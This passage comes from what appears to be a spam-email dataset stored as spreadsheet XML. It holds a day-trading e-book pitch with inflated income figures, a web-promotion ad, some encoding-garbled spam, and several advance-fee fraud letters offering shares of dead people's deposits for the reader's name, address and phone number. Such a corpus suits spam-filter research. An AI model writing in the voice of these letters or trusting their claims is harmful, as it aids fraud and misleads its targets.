    <t>B_x0003__x0002__x0001__x0002__x0005_Â_x0001_\nB_x0007__x0001__x0003__x0003_R{[V\n[^rfIicucj\n_x0002__x0007_I_x0001_c_x0001_B_x0001_©©Ð_x0002__x0007_\nB_x0003_Â_x0007_A_x0002_I\n[URL]http://book-i.net[/URL]\ni\n`@Écn9@_x0013__x0003_\n_x0002__x0002_Â_x0001__x0002__x0002_132iBD]I\n(^-^)/~Fg[\n\n\nTo Unsubscribe: send mail to majordomo@FreeBSD.org\nwith "unsubscribe freebsd-ports" in the body of the message</t>
  </si>
  <si>
    <t>4388</t>
  </si>
  <si>
    <t>To: =?iso-2022-jp?B?MTIx?=@mx2.alles.or.jp\nFrom: =?iso-2022-jp?B?c291czFAYWEuYWxsZXMub3IuanA=?=@mx2.alles.or.jp\nDate: Tue, 10 Sep 2002 06:16:46 +0900</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 06:16:46 +0900</t>
  </si>
  <si>
    <t>=?iso-2022-jp?B?c291czFAYWEuYWxsZXMub3IuanA=?=@mx2.alles.or.jp</t>
  </si>
  <si>
    <t>=?iso-2022-jp?B?MTIx?=@mx2.alles.or.jp</t>
  </si>
  <si>
    <t>B_x0003__x0002__x0001__x0002__x0005_Â_x0001_\nB_x0007__x0001__x0003__x0003_R{[V\n[^rfIicucj\n_x0002__x0007_I_x0001_c_x0001_B_x0001_©©Ð_x0002__x0007_\nB_x0003_Â_x0007_A_x0002_I\n[URL]http://book-i.net[/URL]\ni\n`@Écn9@_x0013__x0003_\n_x0002__x0002_Â_x0001__x0002__x0002_132iBD]I\n(^-^)/~Fg[\n\n\n\nTo Unsubscribe: send mail to majordomo@FreeBSD.org\nwith "unsubscribe freebsd-bugs" in the body of the message</t>
  </si>
  <si>
    <t>4324</t>
  </si>
  <si>
    <t>To: &lt;webmaster@efi.ie&gt;\nFrom: &lt;arnoldm@aol.com&gt;\nDate: Tue, 10 Sep 2002 04:13:50 -1100</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 04:13:50 -1100</t>
  </si>
  <si>
    <t>&lt;arnoldm@aol.com&gt;</t>
  </si>
  <si>
    <t>What Warren Buffett won't tell ya ...</t>
  </si>
  <si>
    <t>It was the Spring of 1979.  \n\nI was just a tall, goofy looking kid in middle school\nwith buck-teeth and freckles.  Each day in the\ncafeteria, I walked from table to table ...\n\nStealing other kids' lunch money.\n\nNo, I didn't rob them with a gun or a knife - I just made\nthem a little deal.  "Let me borrow two dollars today," I said,\n"and I'll bring you five dollars next week."  The investment\nwas too good to pass up, and other kids were throwing their\nlunch money at me like gravy on mashed potatoes.  Of course \nwhen "next week" rolled around and I couldn't pony up the cash,\nI promised to pay them even more the week after that,\nif they would just let me keep their investment a little bit \nlonger.\n\nEventually the end of the year came and went, high school\nstarted and with it came girls, and homework, and parties,\nand sports, and those poor kids from eighth grade had more \nthings on their mind than last year's lunch money.\n\nI made off with a tidy sum for a middle school kid,\nand I didn't even get beat up.\n\nHidden inside this story are the two greatest stock market \nsecrets you will ever learn.\n\nFirst of all, greed is your number one enemy. You're not\ngoing to turn $2 into $5 in a week, so cash out when\nyou're ahead.  Don't wait for the boat to sink before \ngrabbing the lifejacket.\n\nSecond, never trust an investment adviser of any kind.\nThey are looking out for their own money, not yours.\n\nThe "professionals", those stuffy investment counselors and\nmoney managers, will always tell you that the best time to\nbuy is NOW.  According to those guys, the longer you keep\nyour money in the market, the more money you're going to make.\nAsk them when is the best time to sell and their answer is\n"NEVER".  \n\nIn a sense, they are right.  If you put $250,000 in an index\nfund right now, you'll probably have over a million dollars\nin thirty or forty years.  But here's the problem:\n\nDo you want to WAIT thirty or forty years to be rich?\n\nHell no!\n\nYou want the money NOW - so you can enjoy it. It's hard to\nmake use of your fortune when you're seventy years old \nin a wheelchair.  If you could make a million dollars in\nthe next few years, what would you do with it?  Where would\nyou travel?  What kind of car would you buy?  \n\nThe fact is ... youth is the best time to be rich.\n\nIf your goal is to make quick profits in the market, volatility\nis your ally, and stability your enemy.  You want to see\nthose large upswings, two hundred points in a day, followed\nby the four hundred point crash a week later.  You don't\ncare if the market went up or down 20% this year as long\nit was UNSTABLE.  That's how you're going to make the \nmoney.\n\nWhat I'm talking about here is day trading.  \n\nMy father invests the traditional way; he holds some good stocks \nand he goes up 30K and down 30K. In the long term of 5-10 years \nhe makes money. \n\nThe day trader buys or sells 5,000 shares of XYZ for a\n$25,000 profit in a 5-10 minute trade.  He acts quickly, taking \nadvantage of all the information at his disposal about a \ncertain stock, and estimating whether it will go up or \ndown within hours, sometimes within minutes.  \n\nI can teach you how to do this - and how to make amazing \namounts of money at it.  It's not rocket science, and you \nonly need to learn a few basic principles to get started.\n\nSociety would have you believe that successful trading is \ncomplicated and requires formal training.  \n\nThe truth is, wealthy people use very simple investment \nstrategies to make money.  \n\nPopular media and investment professionals portray successful\ntrading as difficult and complex to scare you out of the boxing\nring.  They don't want the competetion - and they sure as hell\ndon't want you paying a few dollars to an online trading firm\nto execute a trade for which they'd charge you forty or fifty \ndollars.\n\nThey make their money only if you believe two lies:\n\n1) That investing is too difficult and risky for the average \nperson.\n\n2) That using an investment adviser who charges a high \ncommission is safer than trading online for a few bucks \nper trade.\n\nHere is what the financial gurus in today's society absolutely,\npositively DO NOT WANT YOU TO KNOW ...\n\nThe strategies for profitable day trading are in fact\nso simple that anyone can do it - provided they spend\na few hours of studying.  \n\nAfter reading over 200 financial books and publications\nduring the past decade, and after using day trading\nto successfully make more than four million dollars in\nthe stock market, I've learned the following lessons:\n\n** Achieving financial success is incredibly simple.\n\n** Anyone can do it.\n\n** It only takes a few hours to learn.\n\nWhen I discovered the secret to day trading, I didn't become\nwealthy overnight.  If you want instant cash, drive to Wal-mart. \nBuy a ski mask and a shotgun, and rob your local bank. The \nonly way to get rich, quick or otherwise, is through\nhard work, knowledge, and determination.\n\nAfter learning the fundamentals of day trading, I started \npracticing the trading art itself, and the first few weeks\nbrought modest gains.  The next few months gave me the practical\nexperience I needed to really earn a living, and I was pulling\nclose to a six figure income. In less than three years with no \nformal financial training, minimal effort and only moderate risk,\nI had made my first million.  The knowledge that I gained \nduring those formative trading years I am willing to share\nwith you in my new book, the Master Trader.  You will learn from\nmy mistakes, and from my successes, as I teach you the simple,\nsecret formula for day trading that I've used profitably\nyear after year.\n\nThe income of the day trader can be staggering.  Thousands, even \nhundreds of thousands of dollars can be made or lost within\nminutes.  The difference between making money and losing your \nshirt is simply this: knowledge.  I will provide that knowledge,\nand I will give you a winning edge at this high-stakes game. \n\nAverage Income of a Day Trader: \n5% average an income in excess of $500,000 per year\n22% average an income in excess of $250,000 per year\n35% average an income in excess of $100,000 per year. \n27% average an income between $50,000 and $99,999 per year \n11% average an income between $20,000 and $49,999 per year \n\nAfter reading the Master Trader, you will discover extremely \nprofitable, simple yet powerful trading methods that give \nyou an almost unfair trading advantage and make you \nwin DESPITE the current market weakness. \n\nHere is just a snippet of what I will teach you:\n\n*** Make money whether a stock goes up or down.\n\n\n*** Learn how to get in and out of stocks within split seconds.\n\n\n*** Learn exactly what stocks to trade, the exact price to \nbuy them and the exact price to sell them. \n\n\n*** Save thousands of dollars by learning to avoid the \nmistakes beginners make.\n\n\n*** Learn how to trade stocks like a pro and how to make money \nconsistently in every market! \n\n\n*** Learn proven strategies that give you the highest chance \nfor great success. \n\n\n*** Profit on huge intraday price swings.\n\n\n*** Make money on the biggest news stories.\n\n\n*** Actively manage your risks and learn how to realize maximum\nreturns. \n\n\n*** Learn how to use the tools and information Wall Street \nprofessionals use.\n\n\n*** Learn how to develop and maintain a winning state of mind. \n\n\nIt's time to ask yourself: "Am I going to listen to the \nProfessionals who say BUY BUY BUY but never sell?  Or am\nI going to take control of my own financial future, and\nstart making money RIGHT NOW in the stock market?"\n\nWho is looking out for your best economic interests - some\nwealthy Wall Street stockbroker, or yourself?\n\nWith the Master Trader e-book, you will learn everything you \nneed to know in order to get started with Day Trading ... from \nchoosing the best broker in order to take advantage of the \nlowest commissions and instant order executions to professional \ntrading strategies that make professional traders millions of \ndollars.\n\nThe Master Trader e-book is the most comprehensive yet easy to \nunderstand and straight-forward book ever written about active \ntrading. If you are serious about success in short term stock \ntrading - ORDER TODAY and start paving the road to your\nown financial future.\n\nOh, and remember that scraggly kid in the eighth grade?\nHis high school friends laughed when he said he was going to \nmake money in the stock market.  \n\nSix years later, he bought a beach-front home on the California\ncoast - WITH CASH.  Oops, they weren't laughing anymore.\n\nIn a rollercoaster market like we have today, day trading\nis the fastest track to wealth.  If you're looking\nfor a long-term retirement investment with no risk \nthat goes up 5% a year, then by all means, this ain't\nyour kind of game.\n\nBut if you want the QUICKEST possible way to make a FORTUNE\nin the market, with the lowest element of risk, then\norder the MASTER TRADER e-book right now.  I promise\nto teach you ALL of the secrets that helped me become a\nmillionaire through successful day trading.\n\nYou don't need to know anything about the market, and\nanyone can do it, with minimum effort.  It's an easy\ngame to win if you know how the pieces move.\n\nOrder the MASTER TRADER e-book right now for only $49.97\nby clicking on the link below:\n\n[URL]http://4tools4life.com[/URL]\n\n******************************************************\nOur company is strictly opposed to unsolicited emails.\nTo be removed from this list, please send an email\nto "bulkexpert@yahoo.com"\n******************************************************\n\n0283PTfl6-774Bfbm7392dPuV0-307VjSM4803zjlu1-614iiKT2570JdKt6-854fhdA5838oELl71</t>
  </si>
  <si>
    <t>4334</t>
  </si>
  <si>
    <t>To: zzzz-list-admin-iiu@spamassassin.taint.org\nFrom: Sarah Williams &lt;bounce@trafficmagnet.com&gt;\nDate: Tue, 10 Sep 2002 03:34:01 +0800 (CST)</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 03:34:01 +0800 (CST)</t>
  </si>
  <si>
    <t>Sarah Williams &lt;bounce@trafficmagnet.com&gt;</t>
  </si>
  <si>
    <t>zzzz-list-admin-iiu@spamassassin.taint.org</t>
  </si>
  <si>
    <t>iiu.taint.org</t>
  </si>
  <si>
    <t>--1189366250.1031600041421.JavaMail.SYSTEM.emaserver2 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit Hi I visited iiu.taint.org, and noticed that you're not listed on some search engines! I think we can offer you a service which can help you increase traffic and the number of visitors to your website. I would like to introduce you to TrafficMagnet.com. We offer a unique technology that will submit your  website to over 300,000 search engines and directories every month. You'll be surprised by the low cost, and by how effective this website promotion method can be.  To find out more about TrafficMagnet and the cost for submitting your website to over 300,000 search  engines and directories, visit us at: [URL]http://p1j2m3a4.pdhost.com[/URL]$DXPhW5$zo   I would love to hear from you.  Best Regards, Sarah Williams Sales and Marketing  E-mail: Sarah_Williams@trafficmagnet.com [URL]http://www.TrafficMagnet.com[/URL] This email was sent to zzzz-list-admin-iiu@jmason.org.  I understand that you may NOT wish to receive information from me by email.  To be removed from this and other offers, simply go to the link below: [URL]http://p1j2m3a4.pdhost.com[/URL] --1189366250.1031600041421.JavaMail.SYSTEM.emaserver2 Content-Type: text/html; charset=utf-8 Content-Transfer-Encoding: 7bit Hi 	I visited iiu.taint.org, and  	noticed that you're not listed on some search engines! I think we can offer  	you a service which can help you increase traffic and the number of visitors  	to your website. 	I would like to introduce you to TrafficMagnet.com. We offer a unique technology  	that will submit your website to over 300,000 search engines and directories  	every month.   	You'll be surprised by the low cost, and by how effective this website promotion  	method can be.  	To find out more about TrafficMagnet and the cost for submitting your website  	to over 300,000 search engines and directories, visit [URL]www.TrafficMagnet.com[/URL]  	 	I would love to hear from you.  	Best Regards, 	Sarah Williams 	Sales and Marketing 	E-mail: Sarah_Williams@trafficmagnet.com [URL]http://www.TrafficMagnet.com[/URL]   This email was sent to zzzz-list-admin-iiu@jmason.org. 	I understand that you may NOT wish to receive information from me by email. 	To be removed from this and other offers, simply click here. --1189366250.1031600041421.JavaMail.SYSTEM.emaserver2--</t>
  </si>
  <si>
    <t>http://p1j2m3a4.pdhost.com http://www.TrafficMagnet.com http://p1j2m3a4.pdhost.com www.TrafficMagnet.com http://www.TrafficMagnet.com</t>
  </si>
  <si>
    <t>2586</t>
  </si>
  <si>
    <t>To: R@S\nFrom: Mr.Abgottspon Ewald &lt;a.ewald00@yahoo.com&gt;\nDate: Tue, 10 Oct 2006 18:56:36 +0200</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2006 18:56:36 +0200</t>
  </si>
  <si>
    <t>Mr.Abgottspon Ewald &lt;a.ewald00@yahoo.com&gt;</t>
  </si>
  <si>
    <t>10/10/2006</t>
  </si>
  <si>
    <t>Mr.Abgottspon Ewald\nBanque Jacob Safra(Schweiz)AG \nBleicherweg 1 / Paradeplatz\n8022 ZURICH\nSwitzerland.\nEmail:aewald2000@msn.com \n\n\n\nDear Sir,\n\nI got your contact on my private search for a reliable and trusted person to handle a transaction of this nature. I know that\nthe contents of this mail might sound so strange, but I want to assure you that every word of it is true.I am Mr.Abgottspon Ewald, a credit officer with Banque Jacob Safra(Schweiz)AG.I have a concealed business suggestion for you.Before the \nplane crash of Mrs.Dimka Ilkova Boskovic on February 26, 2004 ,Dimka Ilkova Boskovic from the Ministry of Foreign \nAffairs,macedonia and also a business woman made a fixed deposit for 12 calendar months, with a value of Nine Million,eight Hundred Thousand United State Dollars only in my branch.You can visit this website:\n\n[URL]http://www.rferl.org[/URL]\n\n\nThe board of directors of my bank adopted a resolution and as the accounting officer to Mrs.Dimka Ilkova Boskovic I was mandated to provide her next of kin for the payment of this money within 14 working days or forfeit the money to the bank as an abandoned property. Further investigations revealed that Dimka Ilkova Boskovic did not declare any next of kin in her official papers including the paper work of his bank deposit. And she also confided in me the last time she was at my office that no one except me knew of her deposit in my bank. So Nine Million,eight Hundred Thousand United State Dollars is still lying in my bank and no one will ever come forward to claim it. What bothers me most is that the directors of my bank had planned to invoke the abandoned property decree of 1991 to confiscate the funds after the expiration of the period given to me, despairing at the point of exhaustiveness but fortunately, I came across your name. My suggestion \nto you is that I will like you to stand as the next of kin to Dimka Ilkova Boskovic so that you will be able to receive this funds.\n\nHowever, I seek your consent to present you as the Next of Kin to the deceased. I have contacted an attorney that will prepare the necessary document that will back you up as the next of kin to Dimka Ilkova Boskovic. All I require is your honest cooperation to enable us see this deal through. I guarantee that this will be executed under a legitimate arrangement that will protect you from any breach of law. Be Inform also that we shall share the funds in the ratio 70% for me and 25% for you, while 5% should be for Expenses or Tax as your Government may require. Please endeavor to observe utmost discretion in all matters concerning this issue. I will bring you into a more detailed picture of this transaction \nwhen I hear from you. Your earliest response to this letter will be appreciated via my private email address(aewald2000@msn.com).\n\n\nKind Regards,\nMr.Abgottspon Ewald.\n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.rferl.org</t>
  </si>
  <si>
    <t>2585</t>
  </si>
  <si>
    <t>To: musa_garuba55@latinmail.com &lt;musa_garuba55@latinmail.com&gt;\nFrom: musa garuba &lt;musa_garuba55@latinmail.com&gt;\nDate: Tue, 10 Oct 2006 18:24:49 +0200</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2006 18:24:49 +0200</t>
  </si>
  <si>
    <t>musa garuba &lt;musa_garuba55@latinmail.com&gt;</t>
  </si>
  <si>
    <t>musa_garuba55@latinmail.com &lt;musa_garuba55@latinmail.com&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF : MUSA GARUBA,\nAUDITING AND ACCOUNTING SECTION,\nAFRICAN DEVLOPMENT BANK ( A.D.B )\nOUAGADOUGOU BURKINA-FASO,WEST AFRICA.\n\nATTENTION PLEASE,\n\nI AM MUSA GARUBA, THE DIRECTOR IN CHARGE OF AUDITING AND ACCOUNTING SECTION OF AFRICAN DEVELOPMENT BANK (A.D.B) OUAGADOUGOU BURKINA-FASO WEST AFRICA. WITH DUE RESPECT AND REGARD. I HAVE DECIDED TO CONTACT YOU ON A BUSINESS TRANSACTION THAT WILL BE VERY BENEFICIAL TO BOTH OF US AT THE END OF THE TRANSACTION .\n\nDURING OUR INVESTIGATION AND AUDITING IN THIS BANK, MY DEPARTMENT CAME ACROSS A VERY HUGE SUM OF MONEY BELONGING TO A DECEASED PERSON WHO DIED IN A PLANE CRASH AND THE FUND HAS BEEN DORMANT IN HIS ACCOUNT WITH THIS BANK WITHOUT ANY CLAIM OF THE FUND IN OUR CUSTODY EITHER FROM HIS FAMILY OR RELATION BEFORE OUR DISCOVERY TO THIS DEVELOPMENT.\n\nTHE SAID AMOUNT WAS U.S$ 22.85M ( TWENTY TWO MILLION, EIGHTY FIVE THOUSAND UNITED STATES DOLLARS). AS IT MAY INTEREST YOU TO KNOW, I GOT YOUR IMPRESSIVE INFORMATION THROUGH INTERNET DIRECTORY . MEANWHILE ALL THE WHOLE ARRANGEMENT TO PUT CLAIM OVER THIS FUND AS THE BONAFIDE NEXT OF KIN TO THE DECEASED, GET THE REQUIRED APPROVAL AND TRANSFER THIS MONEY TO A FOREIGN ACCOUNT HAS BEEN PUT IN PLACE AND DIRECTIVES AND NEEDED INFORMATION WILL BE RELAYED TO YOU AS SOON AS YOU INDICATE YOUR INTEREST AND WILLINGNESS TO ASSIST, AND ALSO BENEFIT YOUR SELF TO THIS GREAT BUSINESS OPPORTUNITY.\n\nIN FACT I COULD HAVE DONE THIS DEAL ALONE BUT BECAUSE OF MY POSITION IN THIS COUNTRY AS A CIVIL SERVANT(A BANKER),WE ARE NOT ALLOWED TO OPERATE A FOREIGN ACCOUNT AND WOULD EVENTUALLY RAISE AN EYE BROW ON MY SIDE DURING THE TIME OF TRANSFER BECAUSE I WORK IN THIS BANK. THIS IS THE ACTUAL REASON WHY IT WILL REQUIRE A SECOND PARTY OR FELLOW WHO WILL FORWARD CLAIMS AS THE NEXT OF KIN WITH AFFIDAVIT OF TRUST OF OATH TO THE BANK AND ALSO PRESENT A FOREIGN ACCOUNT WHERE HE WILL NEED THE MONEY TO BE RE-TRANSFERRED INTO ON HIS REQUEST AS IT MAY BE AFTER DUE VERIFICATION AND CLARIFICATION BY THE CORRESPONDENT BRANCH OF THE BANK WHERE THE WHOLE MONEY WILL BE REMITTED FROM TO YOUR OWN DESIGNATION BANK ACCOUNT.\n\nI WILL NOT FAIL TO INFORM YOU THAT THIS TRANSACTION IS 100% RISK FREE.ON SMOOTH CONCLUSION OF THIS TRANSACTION, YOU WILL BE ENTITLED TO 40% OF THE TOTAL SUM AS GRATIFICATION, WHILE 10% WILL BE SET ASIDE TO TAKE CARE OF EXPENSES THAT MAY ARISE DURING THE TIME OF TRANSFER AND ALSO TELEPHONE AND INTERNET BILLS, WHILE 60% WILL BE FOR ME AND MY COLEAGUES. PLEASE, YOU HAVE BEEN ADVICED TO KEEP "TOP SECRET" AS I AM STILL IN SERVICE AND INTEND TO RETIRE FROM SERVICE AFTER WE CONCLUDE THIS DEAL WITH YOU.\n\nI WILL BE MONITORING THE WHOLE SITUATION HERE IN THIS BANK UNTIL YOU CONFIRM THE MONEY IN YOUR ACCOUNT AND ASK ME TO COME DOWN TO YOUR COUNTRY FOR SUBSEQUENT SHARING OF THE FUND ACCORDING TO PERCENTAGES PREVIOUSLY INDICATED AND FURTHER INVESTMENT, EITHER IN YOUR COUNTRY OR ANY COUNTRY YOU ADVICE US TO INVEST IN. ALL OTHER NECESSARY VITAL NFORMATION WILL BE SENT TO YOU WHEN I HEAR FROM YOU.\n\nI LOOK FORWARD TO RECEIVE YOUR PHONE AND FAX NUMBERS FOR EASY COMMUNICATION,\n\nYOURS FAITHFULLY,\n\nMUSA GARUBA.\n\n\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>222</t>
  </si>
  <si>
    <t>To: pastor_faith@zwallet.com\nFrom: nan\nDate: Tue, 10 Jun 2003 20:11:52 +0000</t>
  </si>
  <si>
    <t>Tue, 10 Jun 2003 20:11:52 +0000</t>
  </si>
  <si>
    <t>pastor_faith@zwallet.com</t>
  </si>
  <si>
    <t>GOD'S  WORK.</t>
  </si>
  <si>
    <t>Beloved in Christ,\n\nIt is a priviledge to hear from God and it gives me\njoy to relate my testimony to you haven recieved\ninstruction from God through divine revelation.\n\nI was a Moslem and a retired military top officer in\nNigerian Army that served under the past military\nregime. I was the financial secretary to the Armed\nForce Ruling Council (AFRC). With my position as a \nfinancial secretary, I was able to secure up to\n$146,000,000.00(One hundred and fourty  six million us\ndollars which i deposited with a finance and security\ncompany in a country that will be disclosed to you\nlater as you indicate interest. I wanted to use this\nfund to context for the post of the president of\nNigeria in the next republic.\n\n\nImmediately I got retired, I was converted from Moslem\nto Christian when I was preached the words of God\nthrough my cousin the pastor of my church I then gave\nmy life to Christ and became a born again Christain.\n\nSince I gave my life to Christ, I had no rest of mind.\nSome times I think of the souls I killed when I was a\nsoldier and the dubious ways I diverted my countrys\nmoney into my Personal Bank Account. I then decided to\n\nseek the face of God for forgiveness and after fasting\nand prayer through Divine Revelation, the Almighty God\nrevealed to me that the only way I could have rest of\nmind is when I used my wealth to do the work of God. \nI have been thinking of the particular thing to do for\nmy God before this present civilian president of my\ncountry set up  a panel(Honourable Oputa Panel) to\nprobe the Bank Account of the past Military officers\nlike me. They suceeded in finding out the funds I have\nin my personal Bank accouts in Nigeria and they have\nseized all my money.I am still facing their charges\nbut i have refused to disclose to them that i have\nsuch money somewhere and they can never find out\nbecause I want to use part of it to do the work of\nGOD.\n\nI have decided to use part of this fund for charity\ninstead of loosing it to my government. I am presently\nunder house arrest and my movement is restricted.The\nconsignments that contained the money is now\naccumulating demurage in the country because the\nagreement time with the security company has passed. I\nhave been  making arrangement to sneak out and clear\nit but I can not travel out now.I sent a message to\nthe security company that I am sending somebody to\ncome and claim the consignments.I want a honest\nchristain who will not run away with my money and who\nwill be honest to use part of the fund for things of\nGod and let the name of the lord be glorify and so\nthat I can have rest of mind as the Lord told me.If\nyou are interested in going to claim the fund,I will\ndisclose to you where i deposited the money and every\ndocument to claim the fund will be fax to you.\n\nI am still making arrangement to see if I can sneak\nout of the country with my family.As soon as you claim\nthe fund,please use half of it for GOD`S WORK and keep\nhalf of it for me till I come over to meet you.\nIf you are interested in going,please send to me your\nfull names,address to submit it to the security\ncompany as the person coming to claim the\nconsignments. \n\nI look forward to your response\n\nGod bless you.\n\nDeacon   pastor faith.\n\n\n\n\n\n\n\n______________________________________________________\nGet Paid... With Your Free Email at\n[URL]http://www.zwallet.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.zwallet.com</t>
  </si>
  <si>
    <t>221</t>
  </si>
  <si>
    <t>To: kennth_uman@zwallet.com\nFrom: nan\nDate: Tue, 10 Jun 2003 19:46:56 -0400</t>
  </si>
  <si>
    <t>Tue, 10 Jun 2003 19:46:56 -0400</t>
  </si>
  <si>
    <t>kennth_uman@zwallet.com</t>
  </si>
  <si>
    <t>ASSITANCE</t>
  </si>
  <si>
    <t>ABUGAL &amp; CO  \nNICON HOUSE, 4TH FLOOR, \nMARINA, LAGOS, \nNIGERIA. \n\n\nATTN: MD/CEO \nPARTNERSHIP REQUEST \nDear Sir, \n    I am a lawyer resident and practising in Lagos,   Nigeria and I am using his correspondence to urgently seek and request your assistance in a ensitive but highly beneficial financial arrangement. An important client of mine whose details I can not release at this point has implored me to contact a reliable and trustworthy partner overseas to urgently receive and handle fund totally Fifty Two Million US Dollars (US$52m) in cash presently lodged in a security outfit in Europe. Due to my client's inability to travel out of the country presently and the fact that we continue to accumulate huge debts daily as long as this consignment remains in the security company,we need a friend and partner to proceed as soon as possible and retrieve this money on behalf of my client and handle it as duely instructed. We have agreed in principle to give thirty-percent (30%) of the total sum to whomever shall handle this fund for us while the remaining seventy-percent (70%) shall be for my !\n client and I. As soon as you are ready to proceed and retrieve this cash on our behalf we shall furnish you with the details and information you will need. Please be rest assured that this arrangement is absolutely risk free and can not implicate you in any way. I implore you to handle this matter with urgency and utmost confidentiality even if you do not intend to execute the project for us. Whatever is the case please acknowledge receipt of this mail via the above E-mail address and if your response is positive we shall\nproceed immediately without any delay. \n\n    Thank you in anticipation of your cooperation and hoping to hear from you soon. \n    Yours sincerely, \n\n    kennth uman.\n\n\n\n\n\n\n\n\n\n\n\n______________________________________________________\nGet Paid... With Your Free Email at\n[URL]http://www.zwallet.com[/URL]\n\n</t>
  </si>
  <si>
    <t>1673</t>
  </si>
  <si>
    <t>To: nan\nFrom: KONE JAMES &lt;kone404@msn.com&gt;\nDate: Tue, 10 Jan 2006 11:29:12 +0000</t>
  </si>
  <si>
    <t>Tue, 10 Jan 2006 11:29:12 +0000</t>
  </si>
  <si>
    <t>KONE JAMES &lt;kone404@msn.com&gt;</t>
  </si>
  <si>
    <t>Kone Law Firm\n6, Kofo Abayomi Street\nVictoria Island\nLagos\nNigeria\n[URL]www.konelawfirm.com[/URL]\nEmail.kone23401@yahoo.com\n\nDear Friend,\n\n\nRE: WILL EXECUTOR\n\nI am sure that this letter  will come to you as a surprise, but I shall be \ngrateful if you would read with the interest of assisting in this proposal \ntendered herein.\nMy name is Barrister   kone james, Attorney at Law and Legal advisor to Mr \nPhelps M. Dasne, A foreigner who used to work with Mekon Associates Company \nin Nigeria.Here after referred to as my Client.\n\nAt about 1.35pm on May 4 2002, my Client, his Wife and their three children \nwere involved in an Air Crash, when the Nigerian Passenger Plane they \nboarded, crashed into a densely populated suburb of the city of Kano in \nnorthern Nigeria, killing at least 148 people on board including my Client, \nhis entire family and the Former Minister of Sport in Nigeria,Late Ishaya \nMark Aku.\n\nFor more sunstantiation about the aformentioned incident; please browse\nthrough the underlisted Web Addresses and read for yourself:\n\n[URL]http://www.dawodu.com[/URL]\n[URL]http://news.bbc.co.uk[/URL]\n\nSubsequently, since then, I have made several inquires to your Embassy to \nlocate any of my Late Client's Extended Relatives, which has also proved \nunsuccessful.\nAfter these several unsuccessful attempts to locate any member of his \nfamily, hence,i contacted you assist me to repatriate the money and property \nleft behind by my Late Client before they get confiscated in the Bank \nTreasury or declared unserviceable by the Finance House where this huge \ndeposit were lodged, so that the proceeds of this Account valued at 3.5 \nMillion Dollars ($3.5MUSD) can be paid to your Account.\n\nThe Finance House where the Deceased had an Account valued at about 3.5 \nMillion Dollars ($3.5MUSD) has issued me a notice to provide the Next Of Kin \nor have the Account dormant &amp; confiscated for inactiveness within the next \n21 banking days.\n\nPragmatically, I have all the necessary legal documents that can be used to \nback up any claim we may make anywhere. All I require is your honest \ncooperation to enable us see this transaction through.\n\nI guarantee that this will be executed under a legitimate arrangement\nthat will protect you from any Breach of the Law.\nInfact, all you are to do is to send the below\ninformation to me,to enable me forward your name to the Finance House as the \nnext of kin to my late client.\n\n{1}. YOUR FULL NAME.\n\n{2}. YOUR CONTACT ADDRESS.\n\n(3)DIRECT TELEPHONE NUMBER\n\nI am willing to share this money with you at the proportion of 30% to \nyou,while 10% for any cost being incured during this transaction, and the \nbalance 60% which is for me will be kept under your supervision immediately \nthe money is transferred into your account for safe keeping.\n\nAll I require is your honest co-operation to enable us see this transaction \nthrough.\n\nI guarantee that this will be executed under a legitimate arrangement that \nwill protect you from any breach of the law. Please get in touch with me by \nmy secured and confidential e-mail:\nkone23401@yahoo.com\ndiscuss further.\n\nFor more sunstantiation about the aformentioned incident; please browse\nthrough the underlisted Web Addresses and read for yourself:\n\n[[URL]http://www.ngex.com[/URL]]\n[[URL]http://news.bbc.co.uk[/URL]]\n[[URL]http://www.dawodu.com[/URL]].\n\nI await your favorable response\n\nYours faithfully,\n\nBarrister: Barrister   kone james.\n\n\n\n\n</t>
  </si>
  <si>
    <t>587</t>
  </si>
  <si>
    <t>To: gt2002@fsmail.net\nFrom: Rashidat Azmil &lt;r_azmil@email.si&gt;\nDate: Tue, 10 Feb 2004 16:09:30 +0100</t>
  </si>
  <si>
    <t>Tue, 10 Feb 2004 16:09:30 +0100</t>
  </si>
  <si>
    <t>Rashidat Azmil &lt;r_azmil@email.si&gt;</t>
  </si>
  <si>
    <t>gt2002@fsmail.net</t>
  </si>
  <si>
    <t>Please Help Me!!!</t>
  </si>
  <si>
    <t>I humbly introduce myself to you; I am Mrs. Alhaja Rashidat Azmil the wife Of \nCaptain Azmil who served in\nIraq.I am contacting you base on trust and humanitarian assistance which I \nurgently need from\nyou. The recent concluded US led war against my country has left my family \ntotally devastated as I\nlost my Husband to the cold hands of death and the children lost thei \nfather.Long before this war\nstarted, my late husband had in his custody $20.7 Million U.S Dollars, but due \nto serious threat of war\nfrom the United States and the collision forces (if our dictator president \ndoes not amend his ways), my\nhusband had to act fast and at such deposited these funds in a Diplomatic \nCondominium in a neighboring\ncountry for the purpose of our family survival after the war might have been \nover.\n\nI am writing you this letter because our dreams was not fulfilled as we could \nnot leave Iraq before the\nwar but we did however succeeded in getting the children to a neighboring \ncountry first before trying\nto proceed with getting ourselves out. It was in the process of us (my Husband \nand I) escaping to a\nneighboring country that we came under friendly fire. It was this mistake that \ntook my husband’s life and\ncritically injured me as the truck we were in went out of control into a brick \nwall. I was rushed to a\nmilitary hospital in a neighboring country where I am currently admitted and \nwriting this\nletter. I am recovering well and now that my health has improved dramatically, \nI need to think of the\nfutureof my Children and who to trust in sending theentire amount kept by my \nlate husband for investment\nand acquiring immigration papers for my children. \n\nIf you believe you can assist me on this endeavor,kindly reply me at \nr_azmil@land.ru so that I shall forward to \nyou all the details required to carry on this transaction successfully. I look \nforward to your prompt favorable\n response.Thanks for your understanding.\n\nYours Respectfully,\nMrs. Rashidat Azmil.\n\nN.B \n(If you have received this email in error, please\naccept my apology. If you no longer wish to receive\nemail from me, please do not reply. Your request will\nbe honored).\n\n\n\n____________________\n[URL]http://www.email.si[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.email.si</t>
  </si>
  <si>
    <t>978</t>
  </si>
  <si>
    <t>To: nan\nFrom: thomasreardon &lt;rea@velocall.com&gt;\nDate: Tue, 09 Nov 2004 15:38:35 -0300</t>
  </si>
  <si>
